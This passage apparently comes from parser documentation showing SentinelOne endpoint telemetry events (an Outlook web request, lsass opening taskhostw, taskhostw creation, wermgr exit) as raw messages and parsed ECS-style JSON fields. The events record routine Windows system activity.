"28C500988B415CA1" - }, - "parent": { - "node": { - "key": "8299EFA6DE45855B" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "A1FFB5A30161CDC0" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6195" - } - }, - "true_context": { - "key": "A1FFB5A30161CDC0" - } - }, - "host": { - "name": "LAPTOP-TECH10", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "http": { - "request": { - "method": "GET" - } - }, - "process": { - "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"", - "executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "hash": { - "md5": "bafa8a3a020648b57622e0b79104468a", - "sha1": "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "sha256": "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1" - }, - "name": "OUTLOOK.EXE", - "pid": 14144, - "start": "2021-09-16T07:02:10.819000Z", - "title": "Microsoft Outlook", - "working_directory": "C:\\Program Files\\Microsoft Office\\root\\Office16" - }, - "related": { - "hash": [ - "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1", - "bafa8a3a020648b57622e0b79104468a" - ], - "user": [ - "CORP\\m.benyounes" - ] - }, - "url": { - "domain": "automation.alticap.com", - "fragment": "frag", - "original": "https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag", - "path": "/media/images/1548943185788.jpg", - "port": 443, - "query": "foo=bar", - "registered_domain": "alticap.com", - "scheme": "https", - "subdomain": "automation", - "top_level_domain": "com" - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6195", - "name": "CORP\\m.benyounes" - } - } - - ``` - - -=== "open_process.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 63, \"uuid\": \"bcc4bf7a284441599707050e1d58a8dd\", \"traceId\": \"CEBBC94D38B041B1B2DE01C315EB28F5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH15\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634712102\"}, \"event_type\": \"openProcess\", \"source\": {\"node\": {\"key\": {\"value\": \"2A2CC1C3468CB3D8\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"1F70F08D24687577\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"59448\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce\", \"sha256\": \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\", \"md5\": \"15a556def233f112d127025ab51ac2d3\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\", \"fullPid\": {\"pid\": 992, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919462523\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"611EAD3E998CF40A\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"E2ABEBDC5F08F279\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\wininit.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"419432\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"915ea28bdaa9a2230ce52080693d7f7e27620ed5\", \"sha256\": \"268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86\", \"md5\": \"9ef51c8ad595c5e2a123c06ad39fccd7\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"wininit.exe\", \"fullPid\": {\"pid\": 900, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919462470\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"0D332A871A7DB912\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Windows Start-Up Application\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"5318E7F038459CED\"}}}, \"excluded\": \"E_FALSE\", \"name\": \"Local Security Authority Process\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"A2DC49811AF8CC72\"}}, \"counters\": {\"crossProcess\": 5262, \"moduleLoad\": 222, \"netConnOut\": 1813, \"crossProcessOutOfGroup\": 5262, \"crossProcessOpenProcess\": 5262, \"dnsLookups\": 51}}, \"target\": {\"node\": {\"key\": {\"value\": \"E94742BA9CF1A186\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"23FF6C2F651EEA11\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe Install $(Arg0)\", \"fullPid\": {\"pid\": 15728, \"startTime\": {\"millisecondsSinceEpoch\": \"1631634711621\"}}, \"user\": {\"name\": \"CORP\\\\j.varinot\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6152\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"399C73C0494DC82C\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"92BFF1D465C6BF8D\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1928, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919463114\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"D382137395ABA2C4\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"4F9F0BD86D6CFE40\"}}, \"counters\": {\"modelChildProcess\": 1596, \"osChildProcess\": 1596, \"crossProcess\": 63, \"moduleLoad\": 81, \"crossProcessOutOfGroup\": 63, \"crossProcessOpenProcess\": 63}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 7, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"AB55C980E679578F\"}}, \"counters\": {\"moduleLoad\": 44}}, \"desiredAccess\": 5240, \"relations\": \"PR_OTHER\"}", - "event": { - "action": "openProcess", - "start": "2021-09-14T15:51:52.102000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 63, - "trace_id": "CEBBC94D38B041B1B2DE01C315EB28F5", - "uuid": "bcc4bf7a284441599707050e1d58a8dd" - }, - "event": { - "type": "openProcess" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "cross_process": 5262, - "dns_lookups": 51, - "module_load": 222, - "net_conn_out": 1813 - }, - "desired_access": 5240, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\lsass.exe", - "node": { - "key": "1F70F08D24687577" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "59448", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "2A2CC1C3468CB3D8" - }, - "parent": { - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\wininit.exe", - "node": { - "key": "E2ABEBDC5F08F279" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "419432", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "611EAD3E998CF40A" - }, - "parent": { - "node": { - "key": "0D332A871A7DB912" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "5318E7F038459CED" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "relations": "PR_OTHER", - "root": "E_TRUE", - "target": { - "command_line": "taskhostw.exe Install $(Arg0)", - "counters": { - "module_load": 44 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\taskhostw.exe", - "node": { - "key": "23FF6C2F651EEA11" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "name": "Host Process for Windows Tasks", - "node": { - "key": "E94742BA9CF1A186" - }, - "parent": { - "node": { - "key": "399C73C0494DC82C" - } - }, - "pid": 15728, - "root": "E_TRUE", - "session_id": 7, - "start": "2021-09-14T15:51:51.621000Z", - "true_context": { - "key": "AB55C980E679578F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6152" - }, - "working_directory": "C:\\WINDOWS\\system32" - }, - "true_context": { - "key": "A2DC49811AF8CC72" - }, - "user": { - "sid": "S-1-5-18" - } - } - }, - "host": { - "name": "LAPTOP-TECH15", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\WINDOWS\\system32\\lsass.exe", - "executable": "C:\\WINDOWS\\system32\\lsass.exe", - "hash": { - "md5": "15a556def233f112d127025ab51ac2d3", - "sha1": "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "sha256": "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427" - }, - "name": "lsass.exe", - "parent": { - "command_line": "wininit.exe", - "hash": { - "md5": "9ef51c8ad595c5e2a123c06ad39fccd7", - "sha1": "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "sha256": "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86" - }, - "name": "wininit.exe", - "pid": 900, - "title": "Windows Start-Up Application", - "working_directory": "C:\\WINDOWS\\system32" - }, - "pid": 992, - "start": "2021-09-06T09:11:02.523000Z", - "title": "Local Security Authority Process", - "working_directory": "C:\\WINDOWS\\system32" - }, - "related": { - "hash": [ - "15a556def233f112d127025ab51ac2d3", - "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86", - "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427", - "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "9ef51c8ad595c5e2a123c06ad39fccd7" - ], - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "process_creation.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 51, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"620565A45ABA475FB419254BE2152CA4\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630507153\"}, \"event_type\": \"processCreation\", \"trueContext\": {\"key\": {\"value\": \"03E80496A6DE3247\"}}, \"process\": {\"node\": {\"key\": {\"value\": \"F85B96F9DB3700A5\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"7543AA6F061EE014\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe Install $(Arg0)\", \"fullPid\": {\"pid\": 15104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631630506706\"}}, \"user\": {\"name\": \"CORP\\\\l.maoui\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6168\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"BAA63DA271B07548\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 10, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"03E80496A6DE3247\"}}, \"counters\": {\"moduleLoad\": 44}}, \"parent\": {\"node\": {\"key\": {\"value\": \"BAA63DA271B07548\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"03708471A478DAC3\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1900, \"startTime\": {\"millisecondsSinceEpoch\": \"1630857368855\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"C36E5F6CB1EFE1FA\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"A27D4C3AA2A4C77B\"}}, \"counters\": {\"modelChildProcess\": 2096, \"osChildProcess\": 2096, \"crossProcess\": 324, \"moduleLoad\": 80, \"crossProcessOutOfGroup\": 324, \"crossProcessOpenProcess\": 324}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}}", - "event": { - "action": "processCreation", - "start": "2021-09-14T14:41:47.153000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 51, - "trace_id": "620565A45ABA475FB419254BE2152CA4", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "processCreation" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 44 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\taskhostw.exe", - "node": { - "key": "7543AA6F061EE014" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "F85B96F9DB3700A5" - }, - "parent": { - "counters": { - "cross_process": 324, - "model_child_process": 2096, - "module_load": 80, - "os_child_process": 2096 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\svchost.exe", - "node": { - "key": "03708471A478DAC3" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAA63DA271B07548" - }, - "parent": { - "node": { - "key": "C36E5F6CB1EFE1FA" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "A27D4C3AA2A4C77B" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "root": "E_TRUE", - "session_id": 10, - "true_context": { - "key": "03E80496A6DE3247" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - } - }, - "true_context": { - "key": "03E80496A6DE3247" - } - }, - "file": { - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - } - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "code_signature": { - "exists": true, - "subject_name": "MICROSOFT WINDOWS", - "valid": true - }, - "command_line": "taskhostw.exe Install $(Arg0)", - "executable": "C:\\Windows\\System32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "parent": { - "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "executable": "C:\\Windows\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 1900, - "start": "2021-09-05T15:56:08.855000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\Windows\\System32" - }, - "pid": 15104, - "start": "2021-09-14T14:41:46.706000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\System32" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\l.maoui" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6168", - "name": "CORP\\l.maoui" - } - } - - ``` - - -=== "process_exit.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 102, \"uuid\": \"e4fb82d7034d4d8983f8f9e103aa394b\", \"traceId\": \"AEA057B816964BDF82E0E2EC171B0C10\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-COM08\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634704684\"}, \"event_type\": \"processExit\", \"trueContext\": {\"key\": {\"value\": \"3B49B9603DFF38C9\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"03B4B5C3910B72FF\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"31E86945F742D096\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\System32\\\\wermgr.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"228680\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"573ad9af63a6a0ab9b209ece518fd582b54cfef5\", \"sha256\": \"1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc\", \"md5\": \"f7991343cf02ed92cb59f394e8b89f1f\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload\", \"fullPid\": {\"pid\": 9876, \"startTime\": {\"millisecondsSinceEpoch\": \"1631634703718\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"6308FCA4876DA87C\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Windows Problem Reporting\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"3B49B9603DFF38C9\"}}, \"counters\": {\"moduleLoad\": 212}}, \"parent\": {\"node\": {\"key\": {\"value\": \"6308FCA4876DA87C\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"B10478282C996149\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1744, \"startTime\": {\"millisecondsSinceEpoch\": \"1631022021170\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"6B6B39C296E3FD3D\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D4ADBE51EE6EC2D0\"}}, \"counters\": {\"modelChildProcess\": 1095, \"osChildProcess\": 1095, \"crossProcess\": 39, \"moduleLoad\": 80, \"crossProcessOutOfGroup\": 39, \"crossProcessOpenProcess\": 39}}}", - "event": { - "action": "processExit", - "start": "2021-09-14T15:51:44.684000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 102, - "trace_id": "AEA057B816964BDF82E0E2EC171B0C10", - "uuid": "e4fb82d7034d4d8983f8f9e103aa394b" - }, - "event": { - "type": "processExit" - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "module_load": 212 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\System32\\wermgr.exe", - "node": { - "key": "31E86945F742D096" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "228680", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "03B4B5C3910B72FF" - }, - "parent": { - "counters": { - "cross_process": 39, - "model_child_process": 1095, - "module_load": 80, - "os_child_process": 1095 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\System32\\svchost.exe", - "node": { - "key": "B10478282C996149" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "6308FCA4876DA87C" - }, - "parent": { - "node": { - "key": "6B6B39C296E3FD3D" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "D4ADBE51EE6EC2D0" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "3B49B9603DFF38C9" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "true_context": { - "key": "3B49B9603DFF38C9" - } - }, - "host": { - "name": "LAPTOP-COM08", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\WINDOWS\\system32\\wermgr.exe -upload", - "executable": "C:\\WINDOWS\\System32\\wermgr.exe", - "hash": { - "md5": "f7991343cf02ed92cb59f394e8b89f1f", - "sha1": "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "sha256": "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc" - }, - "name": "wermgr.exe", - "parent": { - "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "executable": "C:\\WINDOWS\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 